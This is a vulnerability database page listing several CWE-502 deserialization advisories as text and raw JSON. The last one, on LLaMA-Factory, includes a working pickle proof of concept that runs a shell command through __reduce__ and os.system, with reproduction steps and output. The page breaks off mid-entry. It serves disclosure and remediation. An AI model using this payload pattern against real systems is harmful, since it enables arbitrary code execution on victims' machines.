Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4797 vulnerabilities reference this CWE, most recent first.

GHSA-CXQP-32C8-CH8C

Vulnerability from github – Published: 2024-03-20 15:32 – Updated: 2025-05-13 00:31
VLAI
Details

Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons.This issue affects Social Media Share Buttons: from n/a through 2.1.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2721"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-20T12:15:08Z",
    "severity": "HIGH"
  },
  "details": "Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons.This issue affects Social Media Share Buttons: from n/a through 2.1.0.",
  "id": "GHSA-cxqp-32c8-ch8c",
  "modified": "2025-05-13T00:31:10Z",
  "published": "2024-03-20T15:32:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2721"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CXQR-JHPF-63MM

Vulnerability from github – Published: 2026-07-14 06:31 – Updated: 2026-07-14 15:32
VLAI
Details

The Newsletters WordPress plugin before 4.15 does not prevent deserialization of untrusted input that is stored through a public form, allowing unauthenticated attackers to inject a PHP object and, via a property-oriented gadget chain bundled with the Newsletters WordPress plugin before 4.15, write arbitrary files and execute code on the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-12583"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-14T06:17:05Z",
    "severity": "HIGH"
  },
  "details": "The Newsletters WordPress plugin before 4.15 does not prevent deserialization of untrusted input that is stored through a public form, allowing unauthenticated attackers to inject a PHP object and, via a property-oriented gadget chain bundled with the Newsletters WordPress plugin before 4.15, write arbitrary files and execute code on the server.",
  "id": "GHSA-cxqr-jhpf-63mm",
  "modified": "2026-07-14T15:32:15Z",
  "published": "2026-07-14T06:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12583"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/e4c44105-f43d-4dff-8487-7d8ae2691c4e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CXVC-G8F2-4GMM

Vulnerability from github – Published: 2025-09-08 09:31 – Updated: 2025-11-05 20:43
VLAI
Summary
Apache Jackrabbit: Core and JCR Commons are vulnerable to Deserialization of Untrusted Data
Details

There is a serialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.

This issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.

Deployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.jackrabbit:jackrabbit-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "2.22.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.jackrabbit:jackrabbit-jcr-commons"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "2.22.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-09T15:14:38Z",
    "nvd_published_at": "2025-09-08T09:15:30Z",
    "severity": "MODERATE"
  },
  "details": "There is a serialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.\n\nThis issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.\n\nDeployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.",
  "id": "GHSA-cxvc-g8f2-4gmm",
  "modified": "2025-11-05T20:43:58Z",
  "published": "2025-09-08T09:31:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/jackrabbit/pull/229"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/jackrabbit"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/JCR-5135"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/t4wdrost6dh17dh406g792j9wq6xmy6v"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2025/09/06/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Jackrabbit: Core and JCR Commons are vulnerable to Deserialization of Untrusted Data"
}

GHSA-CXVR-5HWP-CJHJ

Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35
VLAI
Details

Unauthenticated PHP Object Injection in Laurits <= 1.5.1 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-40736"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-17T13:20:35Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated PHP Object Injection in Laurits \u003c= 1.5.1 versions.",
  "id": "GHSA-cxvr-5hwp-cjhj",
  "modified": "2026-06-17T18:35:50Z",
  "published": "2026-06-17T18:35:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40736"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/theme/laurits/vulnerability/wordpress-laurits-theme-1-5-1-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F22C-XFCP-G8P7

Vulnerability from github – Published: 2022-10-18 12:00 – Updated: 2022-10-18 12:00
VLAI
Details

An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-22241"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-18T03:15:00Z",
    "severity": "HIGH"
  },
  "details": "An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.",
  "id": "GHSA-f22c-xfcp-g8p7",
  "modified": "2022-10-18T12:00:30Z",
  "published": "2022-10-18T12:00:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22241"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA69899"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F23H-52HJ-99P6

Vulnerability from github – Published: 2023-12-21 12:30 – Updated: 2025-02-13 19:30
VLAI
Summary
Apache IoTDB: Unsafe deserialize map in Sync Tool
Details

Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.

Users are recommended to upgrade to version 1.2.2, which fixes the issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.iotdb:iotdb-parent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.13.0"
            },
            {
              "fixed": "1.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-51656"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-21T18:10:56Z",
    "nvd_published_at": "2023-12-21T12:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.\n\nUsers are recommended to upgrade to version 1.2.2, which fixes the issue.",
  "id": "GHSA-f23h-52hj-99p6",
  "modified": "2025-02-13T19:30:31Z",
  "published": "2023-12-21T12:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51656"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/iotdb"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/zy3klwpv11vl5n65josbfo2fyzxg3dxc"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2023/12/21/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache IoTDB: Unsafe deserialize map in Sync Tool"
}

GHSA-F253-RMGF-G82M

Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35
VLAI
Details

Unauthenticated PHP Object Injection in Hiroshi <= 1.5.1 versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-39560"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-17T14:17:51Z",
    "severity": "HIGH"
  },
  "details": "Unauthenticated PHP Object Injection in Hiroshi \u003c= 1.5.1 versions.",
  "id": "GHSA-f253-rmgf-g82m",
  "modified": "2026-06-17T18:35:54Z",
  "published": "2026-06-17T18:35:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39560"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/theme/hiroshi/vulnerability/wordpress-hiroshi-theme-1-5-1-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F25W-7VP8-H4HW

Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-01 18:30
VLAI
Details

vRealize Log Insight contains a deserialization vulnerability. An unauthenticated malicious actor can remotely trigger the deserialization of untrusted data which could result in a denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-31710"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-26T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "vRealize Log Insight contains a deserialization vulnerability. An unauthenticated malicious actor can remotely trigger the deserialization of untrusted data which could result in a denial of service.",
  "id": "GHSA-f25w-7vp8-h4hw",
  "modified": "2023-02-01T18:30:24Z",
  "published": "2023-01-26T21:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31710"
    },
    {
      "type": "WEB",
      "url": "https://www.vmware.com/security/advisories/VMSA-2023-0001.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F29P-M33V-73CJ

Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-25 00:31
VLAI
Details

Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through <= 1.2.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-68541"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-20T16:22:11Z",
    "severity": "CRITICAL"
  },
  "details": "Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through \u003c= 1.2.0.",
  "id": "GHSA-f29p-m33v-73cj",
  "modified": "2026-02-25T00:31:21Z",
  "published": "2026-02-20T18:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68541"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/ippsum/vulnerability/wordpress-ippsum-theme-1-2-0-php-object-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F2F7-GJ54-6VPV

Vulnerability from github – Published: 2025-04-23 22:21 – Updated: 2025-06-28 00:04
VLAI
Summary
LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py
Details

Description

A critical vulnerability exists in the llamafy_baichuan2.py script of the LLaMA-Factory project. The script performs insecure deserialization using torch.load() on user-supplied .bin files from an input directory. An attacker can exploit this behavior by crafting a malicious .bin file that executes arbitrary commands during deserialization.

Attack Vector

This vulnerability is exploitable without authentication or privileges when a user is tricked into:

  1. Downloading or cloning a malicious project folder containing a crafted .bin file (e.g. via zip file, GitHub repo).
  2. Running the provided conversion script llamafy_baichuan2.py, either manually or as part of an example workflow.

No elevated privileges are required. The user only needs to run the script with an attacker-supplied --input_dir.

Impact

  • Arbitrary command execution (RCE)
  • System compromise
  • Persistence or lateral movement in shared compute environments

Proof of Concept (PoC)

# malicious_payload.py
import torch, pickle, os

class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))  # Arbitrary command

malicious_data = {
    "v_head.summary.weight": MaliciousPayload(),
    "v_head.summary.bias": torch.randn(10)
}

with open("value_head.bin", "wb") as f:
    pickle.dump(malicious_data, f)

An example of config.json:

{
  "model": "value_head.bin",
  "hidden_size": 4096,
  "num_attention_heads": 32,
  "num_hidden_layers": 24,
  "initializer_range": 0.02,
  "intermediate_size": 11008,
  "max_position_embeddings": 4096,
  "kv_channels": 128,
  "layer_norm_epsilon": 1e-5,
  "tie_word_embeddings": false,
  "vocab_size": 151936
}
(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree
.
`-- LLaMA-Factory
    |-- LICENSE
    |-- README.md
    |-- malicious_folder
    |   |-- config.json
    |   `-- value_head.bin
    `-- xxxxx(Irrelevant documents omitted)
# Reproduction
python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out

➡️ Running this will execute the malicious payload and create a HACKED! folder.

(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
CITATION.cff  LICENSE  MANIFEST.in  Makefile  README.md  README_zh.md  assets  data  docker  evaluation  examples  malicious_folder  pyproject.toml  requirements.txt  scripts  setup.py  src  tests
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out
2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
WARNING: All log messages before absl::InitializeLog() is called are written to STDERR
E0000 00:00:1745393818.451398    1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1745393818.456423    1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
Load weights:  50%|██████████████████████████████████████████████████████████████████████████████████▌                                                                                  | 1/2 [00:00<00:00, 123.70it/s]
Traceback (most recent call last):
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 112, in <module>
    fire.Fire(llamafy_baichuan2)
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 135, in Fire
    component_trace = _Fire(component, args, parsed_flag_args, context, name)
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 468, in _Fire
    component, remaining_args = _CallAndUpdateTrace(
                                ^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 684, in _CallAndUpdateTrace
    component = fn(*varargs, **kwargs)
                ^^^^^^^^^^^^^^^^^^^^^^
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 107, in llamafy_baichuan2
    save_weight(input_dir, output_dir, shard_size, save_safetensors)
  File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 35, in save_weight
    shard_weight = torch.load(os.path.join(input_dir, filepath), map_location="cpu")
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1040, in load
    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1260, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
 CITATION.cff   LICENSE       Makefile    README_zh.md   data     evaluation   malicious_folder   pyproject.toml     scripts    src
'HACKED!'       MANIFEST.in   README.md   assets         docker   examples     out                requirements.txt   setup.py   tests

Affected File(s)

  • https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35
  • scripts/convert_ckpt/llamafy_baichuan2.py
  • Line: torch.load(os.path.join(input_dir, filepath), map_location="cpu")

Suggested Fix

  • Replace torch.load() with safer alternatives like safetensors.
  • Validate and whitelist file types before deserialization.
  • Require checksum validation.

Example patch:

# Replace torch.load() with safe deserialization
try:
    from safetensors.torch import load_file
    tensor_data = load_file(filepath)
except Exception:
    print("Invalid or unsafe checkpoint file.")
    return

Workarounds

  • Avoid running the script with untrusted .bin files.
  • Use containers or VMs to isolate script execution.

References

Credits

Discovered and reported by Yu Rong and Hao Fan, 2025-04-23

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.9.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "llamafactory"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46567"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-23T22:21:13Z",
    "nvd_published_at": "2025-05-01T18:15:58Z",
    "severity": "MODERATE"
  },
  "details": "### Description\n\nA critical vulnerability exists in the `llamafy_baichuan2.py` script of the [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization.\n\n### Attack Vector\n\nThis vulnerability is **exploitable without authentication or privileges** when a user is tricked into:\n\n1. Downloading or cloning a malicious project folder containing a crafted `.bin` file (e.g. via zip file, GitHub repo).\n2. Running the provided conversion script `llamafy_baichuan2.py`, either manually or as part of an example workflow.\n\nNo elevated privileges are required. The user only needs to run the script with an attacker-supplied `--input_dir`. \n\n### Impact\n\n- Arbitrary command execution (RCE)\n- System compromise\n- Persistence or lateral movement in shared compute environments\n\n\n### Proof of Concept (PoC)\n\n```python\n# malicious_payload.py\nimport torch, pickle, os\n\nclass MaliciousPayload:\n    def __reduce__(self):\n        return (os.system, (\"mkdir HACKED!\",))  # Arbitrary command\n\nmalicious_data = {\n    \"v_head.summary.weight\": MaliciousPayload(),\n    \"v_head.summary.bias\": torch.randn(10)\n}\n\nwith open(\"value_head.bin\", \"wb\") as f:\n    pickle.dump(malicious_data, f)\n```\n\nAn example of `config.json`:\n\n```json\n{\n  \"model\": \"value_head.bin\",\n  \"hidden_size\": 4096,\n  \"num_attention_heads\": 32,\n  \"num_hidden_layers\": 24,\n  \"initializer_range\": 0.02,\n  \"intermediate_size\": 11008,\n  \"max_position_embeddings\": 4096,\n  \"kv_channels\": 128,\n  \"layer_norm_epsilon\": 1e-5,\n  \"tie_word_embeddings\": false,\n  \"vocab_size\": 151936\n}\n```\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree\n.\n`-- LLaMA-Factory\n    |-- LICENSE\n    |-- README.md\n    |-- malicious_folder\n    |   |-- config.json\n    |   `-- value_head.bin\n    `-- xxxxx(Irrelevant documents omitted)\n```\n\n\n```bash\n# Reproduction\npython scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n```\n\n\u27a1\ufe0f Running this will execute the malicious payload and create a `HACKED!` folder.\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\nCITATION.cff  LICENSE  MANIFEST.in  Makefile  README.md  README_zh.md  assets  data  docker  evaluation  examples  malicious_folder  pyproject.toml  requirements.txt  scripts  setup.py  src  tests\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered\nWARNING: All log messages before absl::InitializeLog() is called are written to STDERR\nE0000 00:00:1745393818.451398    1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered\nE0000 00:00:1745393818.456423    1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered\n2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.\nTo enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.\nLoad weights:  50%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c                                                                                  | 1/2 [00:00\u003c00:00, 123.70it/s]\nTraceback (most recent call last):\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 112, in \u003cmodule\u003e\n    fire.Fire(llamafy_baichuan2)\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 135, in Fire\n    component_trace = _Fire(component, args, parsed_flag_args, context, name)\n                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 468, in _Fire\n    component, remaining_args = _CallAndUpdateTrace(\n                                ^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 684, in _CallAndUpdateTrace\n    component = fn(*varargs, **kwargs)\n                ^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 107, in llamafy_baichuan2\n    save_weight(input_dir, output_dir, shard_size, save_safetensors)\n  File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 35, in save_weight\n    shard_weight = torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1040, in load\n    return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1260, in _legacy_load\n    raise RuntimeError(\"Invalid magic number; corrupt file?\")\nRuntimeError: Invalid magic number; corrupt file?\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\n CITATION.cff   LICENSE       Makefile    README_zh.md   data     evaluation   malicious_folder   pyproject.toml     scripts    src\n\u0027HACKED!\u0027       MANIFEST.in   README.md   assets         docker   examples     out                requirements.txt   setup.py   tests\n```\n\n### Affected File(s)\n\n- https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35\n- `scripts/convert_ckpt/llamafy_baichuan2.py`\n- Line: `torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")`\n\n### Suggested Fix\n\n- Replace `torch.load()` with safer alternatives like `safetensors`.\n- Validate and whitelist file types before deserialization.\n- Require checksum validation.\n\nExample patch:\n\n```python\n# Replace torch.load() with safe deserialization\ntry:\n    from safetensors.torch import load_file\n    tensor_data = load_file(filepath)\nexcept Exception:\n    print(\"Invalid or unsafe checkpoint file.\")\n    return\n```\n\n### Workarounds\n\n- Avoid running the script with untrusted `.bin` files.\n- Use containers or VMs to isolate script 